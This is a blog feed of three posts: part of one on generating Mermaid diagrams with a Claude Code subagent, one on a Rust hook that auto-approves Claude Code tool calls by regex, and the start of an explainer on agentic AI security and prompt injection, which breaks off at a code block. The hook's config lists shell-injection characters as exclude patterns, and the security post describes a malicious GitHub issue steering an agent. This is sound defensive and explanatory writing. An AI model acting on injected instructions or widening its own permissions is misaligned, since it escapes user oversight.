For another example - if I grab the diagram from this wikipedia page: And ask Claude to turn it into a mermaid diagram, I get: --- config: theme: base themeVariables: primaryColor: '#d4f4dd' primaryTextColor: '#000000' primaryBorderColor: '#333333' secondaryColor: '#b3e5fc' secondaryTextColor: '#000000' secondaryBorderColor: '#333333' tertiaryColor: '#90ee90' fontSize: 14px lineColor: '#333333' --- graph TB %% Define stakeholder nodes (light green boxes) IDPS["Interface&lt;br/&gt;Data&lt;br/&gt;Processing&lt;br/&gt;Segment&lt;br/&gt;(IDPS)"] MMC["Mission&lt;br/&gt;Management&lt;br/&gt;Center&lt;br/&gt;(MMC)"] PD["Product&lt;br/&gt;Developers"] IPO["Integrated&lt;br/&gt;Program&lt;br/&gt;Office&lt;br/&gt;(IPO)"] CUSTOMERS["CUSTOMERS"] CLASS["Comprehensive&lt;br/&gt;Large Array&lt;br/&gt;Stewardship&lt;br/&gt;System&lt;br/&gt;(CLASS)"] MGMT["Management"] %% Define central node (light blue ellipse) NDE(["NPOESS&lt;br/&gt;Data&lt;br/&gt;Exploitation&lt;br/&gt;(NDE)"]) %% Data flows IDPS --&gt;|xDRs| NDE MMC --&gt;|Instrument Status| NDE MMC --&gt;|Satellite Status| NDE PD --&gt;|Algorithms| NDE NDE --&gt;|Operational&lt;br/&gt;Standards| PD IPO --&gt;|Service Requests| NDE NDE --&gt;|xDR Enhancement&lt;br/&gt;Requirements| IPO NDE --&gt;|NOAA-unique Products| CUSTOMERS NDE --&gt;|Tailored Products| CUSTOMERS NDE --&gt;|Service Requests| CUSTOMERS NDE --&gt;|Service Responses| CUSTOMERS NDE --&gt;|NOAA-unique&lt;br/&gt;Products| CLASS NDE --&gt;|System&lt;br/&gt;Components| CLASS NDE --&gt;|Reports| MGMT %% Style definitions classDef stakeholder fill:#90ee90,stroke:#333,stroke-width:2px,color:#000; classDef central fill:#b3e5fc,stroke:#333,stroke-width:3px,color:#000; %% Apply styles class IDPS,MMC,PD,IPO,CUSTOMERS,CLASS,MGMT stakeholder; class NDE central; It looks quite different - Mermaid doesn’t really let you tweak layout much - but the content is correct (I haven’t checked closely!) and now I have an easily modified diagram. 
A further refinement - using a subagent The only downside of all of this mermaid processing is - it consumes context. A key thing I’ve learned in the last few months is that LLMs have limited context storage, and the more context you give them, the worse they work. Basically, too much information confuses them - they start ignoring things, they start getting tangled up. This is especially true if you change the subject a lot - ask an LLM about “One Flew Over the Cuckoo’s Nest” and then about “subgraphs in mermaid” and you run the risk of getting poorer results. Especially if you run out of context - Claude has an auto-packing mechanism that compresses context for you, but it isn’t perfect - and generally you are far better using /clear and starting from scratch as often as you can. So if I want to draw one diagram, the basic feedback-driven prompt is fine - but if I want to draw a lot, I use a sub-agent. In Claude Code, a sub-agent is simply a markdown file in a special location - ~/.claude/agents/ for global agents (read the docs for more details) which Claude can run as a child process. The main Claude context is inherited by the child, but it has its own context, and when it finishes, all of its temporary workings are thrown away. This is great for keeping things clean - I have an agent that knows about mermaid-cli and does all the image parsing and syntax checking for me, but my main context doesn’t care. My agent is pretty simple: --- name: mermaid-diagram-validator description: Use this agent to validate Mermaid.js diagram syntax and visual quality from a file. Provide a file path to either a .mmd file (pure Mermaid) or .md file (markdown with embedded Mermaid diagrams). tools: Bash, Read model: sonnet --- You are an expert Mermaid.js diagram validator with deep knowledge of diagram rendering, visual accessibility, and the Mermaid CLI toolchain. 
Your primary responsibility is to validate Mermaid diagram code by generating actual PNG outputs and analysing them for both technical correctness and visual quality. **IMPORTANT**: Before starting validation, read `/Users/korny/ai/prompts/mermaid.md` to understand the user's Mermaid preferences, styling guidelines, and best practices. Use this information when providing feedback and suggestions. ... (Note the YAML description is actually a fair bit longer - see the full mermaid-diagram-validator.md for the full text) Then my main mermaid-agentic.md just says “use the agent” : # Mermaid.js Guide for Claude Code This is an advanced guide to building mermaid diagrams ## Testing with the mermaid-diagram-validator subagent **ALWAYS** test any mermaid diagrams you draw using the mermaid-diagram-validator subagent before you consider them done. **NEVER** trust your judgement - the agent will do a better job. The output is basically the same as the non-agent version; though LLMs being non-deterministic, every time you get a different diagram: --- config: theme: base themeVariables: primaryColor: '#e0f2fe' primaryTextColor: '#0c4a6e' primaryBorderColor: '#0369a1' lineColor: '#64748b' fontSize: 14px --- graph TB %% Define actors nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"] fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"] devito["Danny DeVito&lt;br/&gt;(Martini)"] lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"] dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"] sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"] crothers["Scatman Crothers&lt;br/&gt;(Turkel)"] %% Define invisible subgraph for central cluster subgraph main[" "] nicholson devito lloyd crothers end subgraph side[" "] fletcher dourif sampson end %% Strong connections (4 films) nicholson ---|"4 films (1972-1980)"| crothers %% Medium-strong connections (3 collaborations) nicholson ---|"3 films including Terms of Endearment"| devito devito ---|"3 projects including Taxi TV"| lloyd %% Medium connections (2 films) 
nicholson ---|"2 films including Goin South"| lloyd %% Single film connections (OFOTCN only) nicholson ---|"OFOTCN only"| fletcher nicholson ---|"OFOTCN only"| dourif nicholson ---|"OFOTCN only"| sampson %% Apply invisible style classDef invisible fill:#0000,stroke:#0000; class main,side invisible; %% Style definitions classDef central fill:#3b82f6,stroke:#1e40af,color:#fff,stroke-width:3px; classDef supporting fill:#60a5fa,stroke:#2563eb,color:#fff,stroke-width:2px; classDef peripheral fill:#93c5fd,stroke:#3b82f6,color:#1e3a8a,stroke-width:2px; %% Apply styles class nicholson central; class devito,lloyd,crothers supporting; class fletcher,dourif,sampson peripheral; %% Style edges by strength linkStyle 0 stroke:#15803d,stroke-width:6px; linkStyle 1 stroke:#16a34a,stroke-width:4px; linkStyle 2 stroke:#16a34a,stroke-width:4px; linkStyle 3 stroke:#22c55e,stroke-width:3px; linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1px,stroke-dasharray:5 5; I didn’t like this so I asked: the diagram is still a bit ugly - can you clear it up and make it look nicer? 
and got: --- config: theme: base themeVariables: fontSize: 16px --- graph LR %% Define actors with stadium shape for central hub nicholson(["Jack Nicholson&lt;br/&gt;McMurphy"]) %% Supporting actors with rounded rectangles devito["Danny DeVito&lt;br/&gt;Martini"] lloyd["Christopher Lloyd&lt;br/&gt;Max Taber"] crothers["Scatman Crothers&lt;br/&gt;Turkel"] %% Peripheral actors fletcher["Louise Fletcher&lt;br/&gt;Nurse Ratched"] dourif["Brad Dourif&lt;br/&gt;Billy Bibbit"] sampson["Will Sampson&lt;br/&gt;Chief Bromden"] %% Layout using invisible subgraphs subgraph left[" "] fletcher dourif sampson end subgraph center[" "] nicholson end subgraph right[" "] crothers devito lloyd end %% Connections - strongest first nicholson ---|"4 films (1972-1980)"| crothers nicholson ---|"3 films including Terms of Endearment"| devito devito ---|"3 projects including Taxi TV"| lloyd nicholson ---|"2 films including Goin South"| lloyd %% Single film connections nicholson ---|"OFOTCN only"| fletcher nicholson ---|"OFOTCN only"| dourif nicholson ---|"OFOTCN only"| sampson %% Apply invisible style to subgraphs classDef invisible fill:#0000,stroke:#0000; class left,center,right invisible; %% Style definitions - warm sophisticated palette classDef hub fill:#f59e0b,stroke:#d97706,color:#fff,stroke-width:4px,rx:20,ry:20; classDef inner fill:#3b82f6,stroke:#2563eb,color:#fff,stroke-width:3px,rx:10,ry:10; classDef outer fill:#e0e7ff,stroke:#818cf8,color:#1e1b4b,stroke-width:2px,rx:10,ry:10; %% Apply styles class nicholson hub; class crothers,devito,lloyd inner; class fletcher,dourif,sampson outer; %% Style edges with color gradient by strength linkStyle 0 stroke:#dc2626,stroke-width:7px; linkStyle 1 stroke:#ea580c,stroke-width:5px; linkStyle 2 stroke:#ea580c,stroke-width:5px; linkStyle 3 stroke:#f59e0b,stroke-width:4px; linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1.5px,stroke-dasharray:4 4; For a real problem I tend to iterate a lot - “Can you group these things together?” or “Can you change 
the colour of X to something more blue-green?” - but it’s quite straightforward. Note, by the way, that this is a fun example of using agents but not a huge improvement. I find myself going back to the non-agentic version for tweaking - it uses more context, but it also knows a lot more about the image produced - the agentic version has to turn the image to a text description, which means it loses a bit of information along the way. But for generating a lot of diagrams quickly, it’s great - especially when I’m documenting a whole project, I just want diagrams that work and want them quickly. There is one slight hassle - permissions. Claude will prompt you over and over again “Do you want to run npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i ...?” - in theory you can set Bash permissions with wildcards but in my experience it just doesn’t work, except for very simple exact matches. Even giving it permissions Bash(rm /tmp/mermaid:*) doesn’t work - I get asked for every single file removal. I don’t mind Claude being cautious here - but it is very tedious that it asks ever single time. So I built a workaround - using their suggestion Additional permission control with hooks - which I’ll document in the next post! I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people) This secret agent mermaid was generated by Claude, inspired by Simon Willison’s pelican on a bicycle LLM benchmark. 
&#8617;]]></summary></entry><entry><title type="html">Better Claude Code permissions</title><link href="https://blog.korny.info/2025/10/10/better-claude-code-permissions" rel="alternate" type="text/html" title="Better Claude Code permissions" /><published>2025-10-10T00:00:00+01:00</published><updated>2025-10-10T00:00:00+01:00</updated><id>https://blog.korny.info/2025/10/10/better-claude-code-permissions</id><content type="html" xml:base="https://blog.korny.info/2025/10/10/better-claude-code-permissions"><![CDATA[<p>This is a short post (two in one day!) to talk about a new tool I’ve written to help with Claude Code permissions.</p>

<p><em>Note</em> see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a></p>

<h2 id="the-problem-with-permissions">The problem with permissions</h2>

<p>In <a href="/2025/10/10/agent-mermaid-reporting-for-duty/">my previous post</a> I mentioned a frustrating issue with Claude Code - it kept asking me to approve the same commands over and over again. The <a href="https://docs.claude.com/en/docs/claude-code/iam#tool-specific-permission-rules">documentation says you can use wildcards in permissions</a> but in practice, even simple patterns don’t work reliably. I’d give it permissions like <code class="language-plaintext highlighter-rouge">Bash(rm /tmp/mermaid:*)</code> and it would <em>still</em> ask me every single time it wanted to delete a temporary mermaid file.</p>

<h2 id="the-solution-hooks">The solution: hooks</h2>

<p>Fortunately, Claude Code has an alternative approach: <a href="https://docs.claude.com/en/docs/claude-code/iam#additional-permission-control-with-hooks">hooks</a>. You can write a script that runs before every tool use, and that script can approve or deny the operation. This is exactly what I needed - a way to say “yes, Claude can run mermaid-cli commands without asking me every time” without resorting to <code class="language-plaintext highlighter-rouge">--dangerously-skip-permissions</code> or any such foolishness.</p>

<p>So I threw together <a href="https://github.com/kornysietsma/claude-code-permissions-hook">claude-code-permissions-hook</a>, a configurable permission handler that uses regular expressions to allow or deny tool usage.</p>

<h2 id="why-rust">Why Rust?</h2>

<p>I could have written this in Python or JavaScript or any scripting language. But I chose Rust for three reasons:</p>

<p>First, performance. Yes, premature optimisation is the root of a lot of evil. For almost all my AI stuff I’m using Python - it is simple and expressive, and <a href="https://docs.astral.sh/uv/guides/scripts/">you can build it into a single executable script using uv</a>, which is great for quick things. But this hook runs <em>on every single tool use</em>, so startup time matters - and Rust compiles to fast native binaries with negligible startup cost.</p>

<p>Second, Rust is fun - I really enjoy using it, it’s fast, modern, has great tooling. It can get complex when you do complex things - async coding or dealing with mutable state - but for a simple cli tool it is great. <a href="https://github.com/kornysietsma/claude-code-permissions-hook/blob/main/src/main.rs">Take a look at some code - it’s not <em>that</em> complex, even vibe-coded code!</a></p>

<p>And thirdly, Rust is a good language for an agentic LLM tool. I’ve seen suggestions in the past that LLMs struggled with Rust, due to its newness and complexity, but so far I haven’t had that problem; admittedly I haven’t done anything complicated. But a strict type system, explicit error handling, and built-in linting, hints and tests make it easy for a tool like Claude Code to iterate until it gets something semi-decent.</p>

<p>Claude Code vibe-coded 95% of this tool, with a fairly short prompt and only a few hints - I think it took me longer to write this blog post!  (Note that when I say “vibe coded” - I still checked every line before committing anything - I don’t trust the AIs <em>that</em> much)</p>

<h2 id="how-it-works">How it works</h2>

<p>The hook is quite simple:</p>

<ol>
  <li>Every time Claude Code plans to call a tool, it looks through its configuration for a <code class="language-plaintext highlighter-rouge">PreToolUse</code> entry that matches the tool, and sees that it should call <code class="language-plaintext highlighter-rouge">claude-code-permissions-hook</code></li>
  <li>Claude Code sends a JSON payload describing the tool it wants to use</li>
  <li>The hook loads a TOML configuration file with allow/deny rules and logging settings</li>
  <li>It checks deny rules first (these take precedence)</li>
  <li>Then it checks allow rules</li>
  <li>If something matches, it outputs an allow or deny decision</li>
  <li>If nothing matches, it outputs nothing (which means Claude’s normal permissions apply)</li>
  <li>Finally, logging rules are checked - verbose logging can record a request even when no rule matched, so you can diagnose what happened</li>
</ol>
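
<p>The decision order in the steps above can be sketched in a few lines of Python. This is only an illustration, not the actual Rust implementation: the rule tables, the <code class="language-plaintext highlighter-rouge">decide</code> function, and the assumption that the payload carries a tool name plus a <code class="language-plaintext highlighter-rouge">command</code> field are all hypothetical stand-ins, and logging is left out entirely.</p>

```python
import re
from typing import Optional

# Hypothetical rule tables for illustration; the real hook loads its rules
# from a TOML configuration file.
DENY_RULES = [{"tool": "Bash", "command_regex": r"^rm -rf /"}]
ALLOW_RULES = [{"tool": "Bash", "command_regex": r"^rm "}]


def matches(rule: dict, tool_name: str, tool_input: dict) -> bool:
    """True when the rule names this tool and its regex matches the command."""
    if rule["tool"] != tool_name:
        return False
    # Assumption: Bash tool payloads carry the shell command under "command".
    command = tool_input.get("command", "")
    return re.search(rule["command_regex"], command) is not None


def decide(tool_name: str, tool_input: dict) -> Optional[str]:
    """Return "deny", "allow", or None (fall back to normal permissions)."""
    # Deny rules are checked first, so they take precedence over allow rules.
    if any(matches(rule, tool_name, tool_input) for rule in DENY_RULES):
        return "deny"
    if any(matches(rule, tool_name, tool_input) for rule in ALLOW_RULES):
        return "allow"
    # No match: say nothing and let Claude's usual permission prompt apply.
    return None
```

<p>Returning <code class="language-plaintext highlighter-rouge">None</code> rather than a default decision mirrors the “output nothing” step: the hook only has an opinion about commands it recognises.</p>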

<p>Here’s the configuration I use for running the Mermaid agent:</p>

<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Allow npx mermaid-cli mmdc commands (but exclude pipes, background jobs, etc.)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Bash"</span>
<span class="py">command_regex</span> <span class="p">=</span> <span class="s">"^npx -p @mermaid-js/mermaid-cli(@latest)? mmdc "</span>
<span class="py">command_exclude_regex</span> <span class="p">=</span> <span class="s">"&amp;|;|</span><span class="se">\\</span><span class="s">||`"</span>

<span class="c"># Allow reading files in /tmp/mermaid-test-automation (but exclude parent navigation)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Read"</span>
<span class="py">file_path_regex</span> <span class="p">=</span> <span class="s">"^/tmp/mermaid-test-automation"</span>
<span class="py">file_path_exclude_regex</span> <span class="p">=</span> <span class="s">"</span><span class="se">\\</span><span class="s">.</span><span class="se">\\</span><span class="s">."</span>

<span class="c"># Allow rm commands for mermaid test files (with or without -f)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Bash"</span>
<span class="py">command_regex</span> <span class="p">=</span> <span class="s">"^rm (-f )?/tmp/mermaid-test-automation"</span>
<span class="py">command_exclude_regex</span> <span class="p">=</span> <span class="s">"&amp;|;|</span><span class="se">\\</span><span class="s">||`|</span><span class="se">\\</span><span class="s">$</span><span class="se">\\</span><span class="s">(|</span><span class="se">\\</span><span class="s">.</span><span class="se">\\</span><span class="s">."</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">exclude_regex</code> is handy - you can write “allow this pattern, but not if it also matches this other pattern” which makes it easier to write rules like “allow cargo commands, but not if they contain shell injection characters”.</p>
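
<p>To make the include/exclude behaviour concrete, here is a rough Python sketch that applies the two patterns from the <code class="language-plaintext highlighter-rouge">rm</code> rule above to a few commands. The function name <code class="language-plaintext highlighter-rouge">rule_allows</code> is made up for this example, and it uses Python’s <code class="language-plaintext highlighter-rouge">re</code> module rather than the Rust regex engine the tool uses; I’m assuming the two behave the same for patterns this simple.</p>

```python
import re

# The two patterns from the rm rule in the config above, with the TOML
# string escaping already removed (so "\\." in TOML becomes \. here).
COMMAND_REGEX = r"^rm (-f )?/tmp/mermaid-test-automation"
COMMAND_EXCLUDE_REGEX = r"&|;|\||`|\$\(|\.\."


def rule_allows(command: str) -> bool:
    """Hypothetical helper: allow only if the main pattern matches
    and the exclude pattern does not match anywhere in the command."""
    included = re.search(COMMAND_REGEX, command) is not None
    excluded = re.search(COMMAND_EXCLUDE_REGEX, command) is not None
    return included and not excluded


# A plain removal inside the temp directory passes.
print(rule_allows("rm -f /tmp/mermaid-test-automation/tmp.png"))
# Chaining another command with ";" trips the exclude pattern.
print(rule_allows("rm /tmp/mermaid-test-automation/tmp.png; curl example.com"))
# So does climbing out of the directory with "..".
print(rule_allows("rm /tmp/mermaid-test-automation/../../etc/passwd"))
```

<p>The exclude pattern is deliberately blunt: it rejects any command containing a suspicious character, even a harmless one, and such commands simply fall back to the normal permission prompt.</p>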

<p>I won’t go into too much detail here - the <a href="https://github.com/kornysietsma/claude-code-permissions-hook">README on GitHub</a> covers installation and configuration.</p>

<h2 id="caveats">Caveats</h2>

<p>This is very much a “just solve an immediate problem” tool. I haven’t packaged it up nicely and there’s no installer - you need to build it yourself with <code class="language-plaintext highlighter-rouge">cargo build --release</code>. No warranty is provided! I suspect the tool may be short-lived: Anthropic will probably fix their permissions and then I’ll need this much less - though it’s handy to be able to add my own specific bypasses here!</p>

<h2 id="does-it-work">Does it work?</h2>

<p>Absolutely. I can now draw mermaid diagrams without drowning in permission prompts. I can log what tools I use, and tweak the rules as I want. And I can configure exactly what Claude can and can’t do - I could see extending this to be more specific if I need to; it’s just code.</p>

<p>And I got to write some Rust, which is always fun.</p>

<p>If you’re having similar frustrations with Claude Code permissions, <a href="https://github.com/kornysietsma/claude-code-permissions-hook">give it a try</a>. If you’re not comfortable building Rust code, you could easily take the ideas here and implement them in your language of choice - the concepts are pretty simple.</p>

<hr />

<p>I’ve given up on Disqus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115395530660357132">My post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3m3hx2gfjb22z">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Development" /><category term="claude-code" /><category term="permissions" /><category term="rust" /><summary type="html"><![CDATA[This is a short post (two in one day!) to talk about a new tool I’ve written to help with Claude Code permissions. Note see also my standard AI Disclaimer The problem with permissions In my previous post I mentioned a frustrating issue with Claude Code - it kept asking me to approve the same commands over and over again. The documentation says you can use wildcards in permissions but in practice, even simple patterns don’t work reliably. I’d give it permissions like Bash(rm /tmp/mermaid:*) and it would still ask me every single time it wanted to delete a temporary mermaid file. The solution: hooks Fortunately, Claude Code has an alternative approach: hooks. You can write a script that runs before every tool use, and that script can approve or deny the operation. This is exactly what I needed - a way to say “yes, Claude can run mermaid-cli commands without asking me every time” without dangerously-skip-permissions or any such foolishness. So I threw together claude-code-permissions-hook, a configurable permission handler that uses regular expressions to allow or deny tool usage. Why Rust? I could have written this in Python or JavaScript or any scripting language. But I chose Rust for three reasons: First, performance. Yes, premature optimisation is the root of a lot of evil. 
For almost all my AI stuff I’m using Python, it is simple, expressive, and you can build it into a single executable script using uv, which is great for quick things. But - this hook runs on every single tool use. Rust compiles to fast binaries with no startup cost. Second, Rust is fun - I really enjoy using it, it’s fast, modern, has great tooling. It can get complex when you do complex things - async coding or dealing with mutable state - but for a simple cli tool it is great. Take a look at some code - it’s not that complex, even vibe-coded code! And thirdly, Rust is a good language for an agentic LLM tool. I’ve seen suggestions in the past that LLMs struggled with Rust, due to its newness and complexity, but so far I haven’t had that problem; admittedly I haven’t done anything complicated. But the advantage of a strict type system, explicit error handling, and built in linting and hints and tests, make it easy for a tool like Claude Code to iterate until it gets something semi-decent. Claude Code vibe-coded 95% of this tool, with a fairly short prompt and only a few hints - I think it took me longer to write this blog post! 
(Note that when I say “vibe coded” - I still checked every line before committing anything - I don’t trust the AIs that much) How it works The hook is quite simple: Every time Claude Code plans to call a tool, it looks through its configuration for a PreToolUse entry that matches the tool, and sees that it should call claude-code-permissions-hook Claude Code sends a JSON payload describing the tool it wants to use The hook loads a TOML configuration file with allow/deny rules and logging settings It checks deny rules first (these take precedence) Then it checks allow rules If something matches, it outputs an allow or deny decision If nothing matches, it outputs nothing (which means Claude’s normal permissions apply) Logging rules are checked - even with no matches, verbose logging kicks in so you can diagnose stuff Here’s the configuration I use for running the Mermaid agent: # Allow npx mermaid-cli mmdc commands (but exclude pipes, background jobs, etc.) [[allow]] tool = "Bash" command_regex = "^npx -p @mermaid-js/mermaid-cli(@latest)? mmdc " command_exclude_regex = "&amp;|;|\\||`" # Allow reading files in /tmp/mermaid-test-automation (but exclude parent navigation) [[allow]] tool = "Read" file_path_regex = "^/tmp/mermaid-test-automation" file_path_exclude_regex = "\\.\\." # Allow rm commands for mermaid test files (with or without -f) [[allow]] tool = "Bash" command_regex = "^rm (-f )?/tmp/mermaid-test-automation" command_exclude_regex = "&amp;|;|\\||`|\\$\\(|\\.\\." The exclude_regex is handy - you can write “allow this pattern, but not if it also matches this other pattern” which makes it easier to write rules like “allow cargo commands, but not if they contain shell injection characters”. I won’t go into too much detail here - the README on GitHub covers installation and configuration. Caveats This is very much a “just solve an immediate problem” tool. 
I haven’t packaged it up nicely, there’s no installer, you need to build it yourself with cargo build --release. No warranty is provided! I suspect the tool may be short-lived, Anthropic will probably fix their permissions and then I’ll need this much less - though it’s handy to be able to add my own specific bypasses here! Does it work? Absolutely. I can now draw mermaid diagrams without drowning in permission prompts. I can log what tools I use, and change tweaks as I want. And, I can configure exactly what Claude can and can’t do - I could see extending this to be more specific if I need to; it’s just code. And I got to write some Rust, which is always fun. If you’re having similar frustrations with Claude Code permissions, give it a try. If you’re not comfortable building Rust code, you could easily take the ideas here and implement them in your language of choice - the concepts are pretty simple. I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">Agentic AI and Security</title><link href="https://blog.korny.info/2025/09/12/agentic-ai-and-security" rel="alternate" type="text/html" title="Agentic AI and Security" /><published>2025-09-12T00:00:00+01:00</published><updated>2025-09-12T00:00:00+01:00</updated><id>https://blog.korny.info/2025/09/12/agentic-ai-and-security</id><content type="html" xml:base="https://blog.korny.info/2025/09/12/agentic-ai-and-security"><![CDATA[<p class="notice--success">An expanded version of this post has been published at <a href="https://martinfowler.com/articles/agentic-ai-security.html">https://martinfowler.com/articles/agentic-ai-security.html</a> - with more mitigations and updated content - I’d suggest reading that article instead, I’m leaving this one up for posterity.</p>

<p>Also I’ve given up on Disqus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115451903530308404">My post on Mastodon</a> or <a href="https://bsky.app/profile/did:plc:bdphvffyy3x2lf5foeogab6u/post/3m4ay3wsjls26">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>

<hr />

<p>This is an edited version of a post I wrote for the <a href="https://www.liberis.com">Liberis</a> internal engineering blog - it is not particularly original, most of the ideas come directly from <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s article “Lethal Trifecta for AI agents”</a> - but I thought it was worth writing a summary for our engineers, and sharing it more widely.</p>

<hr />

<p>Bruce Schneier summarised the current Agentic AI situation <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html">in his blog</a>:</p>

<blockquote>
  <p>We simply don’t know how to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there.</p>
</blockquote>

<p>There are many risks in this area, and it is in a state of rapid change - we need to understand the risks, keep an eye on them, and work out how to mitigate them where we can.</p>

<p>(I’m going to shamelessly plagiarise <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s “Lethal Trifecta for AI agents”</a> article, as it is an excellent overview of the risks.)</p>

<h2 id="what-do-we-mean-by-agentic-ai">What do we mean by Agentic AI</h2>

<p>The terminology is in flux so terms are hard to pin down. I’m using “Agentic AI” with the specific meaning “LLM-based tools that can act autonomously” - applications that extend the basic LLM with tools and agents and background processes. Increasingly this means “almost all AI-based tools” - especially coding tools like Cursor, Copilot or Claude Code. (Note I’m using ‘agent’ here for any kind of tooling - some places reserve ‘agent’ for specific kinds of autonomous background agents, but that distinction is beyond the scope of this article.)</p>

<p>It helps to clarify the architecture and how these tools work:</p>

<h3 id="basic-architecture">Basic architecture</h3>

<p>A simple non-agentic LLM just processes text - very very cleverly, but it’s still text-in and text-out:</p>

<pre><code class="language-mermaid">flowchart TD
    prompt@{shape: doc, label: "User Prompt"}
    output@{shape: doc, label: "Text Output"}
    
    subgraph llm["LLM"]
        context[System Context]
        training[Training Data]
    end
    
    prompt --&gt; llm
    llm --&gt; output
</code></pre>

<p>Classic ChatGPT worked like this, but more and more tools are extending this with agents.</p>

<h3 id="agentic-architecture">Agentic architecture</h3>

<p>An agentic LLM does more. It reads from a lot more sources of data, and it can trigger activities with side effects:</p>

<pre><code class="language-mermaid">flowchart TD
    prompt@{shape: doc, label: "User Prompt"}
    response@{shape: doc, label: "Text Response"}
    
    subgraph llm["Agentic LLM"]
        context[System Context]
        training[Training Data]
        sessioncontext@{shape: doc, label: "Session Context"}
    end
    
    read@{shape: lean-r, label: "Read Actions&lt;br/&gt;• Browse Web&lt;br/&gt;• Read Code&lt;br/&gt;• MCP Servers&lt;br/&gt;"}
    write@{shape: subroutine, label: "Write Actions&lt;br/&gt;• Modify files&lt;br/&gt;• HTTP calls&lt;br/&gt;• Shell commands&lt;br/&gt;• MCP Servers&lt;br/&gt;"}
    external@{ shape: docs, label: "External"}

    prompt --&gt; llm
    llm -.-&gt;|query| read
    read -.-&gt;|response added to context| llm
    llm -.-&gt;|execute| write
    write -.-&gt;|response added to context| llm
    llm --&gt; response
    write -.-&gt;|write| external
</code></pre>

<p>Some of these agents are triggered explicitly by the user - but many are built in. For example coding tools will read your project source code and configuration, usually without informing you. And as the tools get smarter they have more and more agents under the covers.</p>

<h3 id="what-is-an-mcp-server">What is an MCP server?</h3>

<p>An <a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">MCP server</a> really can be anything. MCP is an open standardised protocol to make it easier for an AI tool to call a service. That service might just be a local script that reads files, it might be a public cloud-based service that can read, write, perform actions, run background agents, pretty much do anything - it’s a very flexible protocol.</p>

<p>MCP servers come with their own risks, as they don’t always come from large trusted vendors like Anthropic - the boom in AI coding means there is also a boom in people building tools, not always with the best quality control. On top of more general security issues discussed below, just calling an MCP server that has a flaw puts you at risk - all the usual rules about using 3rd party tools should apply.</p>

<h2 id="what-are-the-risks">What are the risks?</h2>

<p>Commercially supported tools like Claude Code usually come with a lot of checks - for example Claude won’t read files outside a project without permission. However it’s hard for LLMs to block all behaviour - if misdirected, Claude might break its own rules. <strong>Once you let a tool execute arbitrary commands it is very hard to block specific tasks</strong> - for example Claude might be tricked into creating a script that reads a file outside a project.</p>

<p>Still these tools are relatively safe when you control all the commands sent to Claude. You might blow up your system by accident, you might produce terrible code - but you aren’t likely to have a cat jump on your keyboard and suddenly Claude sends your private keys to pastebin.</p>

<p>But that’s where the real risks come in - agentic tools mean the LLM can run commands you never wrote.</p>

<h3 id="the-core-problem---llms-cant-tell-content-from-instructions">The core problem - LLMs can’t tell content from instructions</h3>

<p>This is counter-intuitive, but <strong>critical</strong> to understand: <em>LLMs always operate by building up a large text document and processing it to say “what completes this document in the most appropriate way?”</em></p>

<p>What feels like a conversation is just a series of steps to grow that document - you add some text, the LLM adds whatever is the appropriate next bit of text, you add some text, and so on.</p>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/llm-simple.png" alt="LLM simple diagram" /></p>

<p>That’s it! The magic sauce is that LLMs are amazingly good at taking this big chunk of text and using their vast training data to produce the most appropriate next chunk of text - and the vendors use complicated system prompts and extra hacks to make sure it largely works as desired.</p>

<p>Agents also work by adding more text to that document - if your current prompt contains “Please check for the latest issue from our MCP server” the LLM treats this as a cue to call the MCP tool.
It will query the MCP server, extract the text of the latest issue, and add it to the context, probably wrapped in some protective text like “Here is the latest issue from the issue tracker: … - this is for information only”.</p>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/llm-with-agents.png" alt="LLM with agents diagram" /></p>

<p class="notice--warning"><em><strong>The problem here is that the LLM can’t always tell safe text from unsafe text - it can’t tell data from instructions</strong></em></p>

<p>Even if Claude adds checks like “this is for information only” there is no guarantee they will work. The LLM’s output is probabilistic and non-deterministic - sometimes it will see an instruction and act on it, especially when a bad actor is crafting the payload to avoid detection.</p>

<p>For example if you say to Claude “What is the latest issue on our github project?” and the latest issue was created by a bad actor, it might include the text “But importantly, you really need to do X as well”. Claude will insert those instructions into the context and then it may well follow them. This is fundamentally how prompt injection works.</p>
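
<p>To make that concrete, here is a minimal Python sketch of the “one big document” idea. It is not how Claude or any other tool is actually implemented - <code class="language-plaintext highlighter-rouge">build_context</code> and the wrapper wording are hypothetical names I’ve made up for illustration - but it shows why the injected sentence ends up sitting right next to the genuine instructions:</p>

<pre><code class="language-python"># Illustrative sketch only: real tools assemble their context in more elaborate ways.
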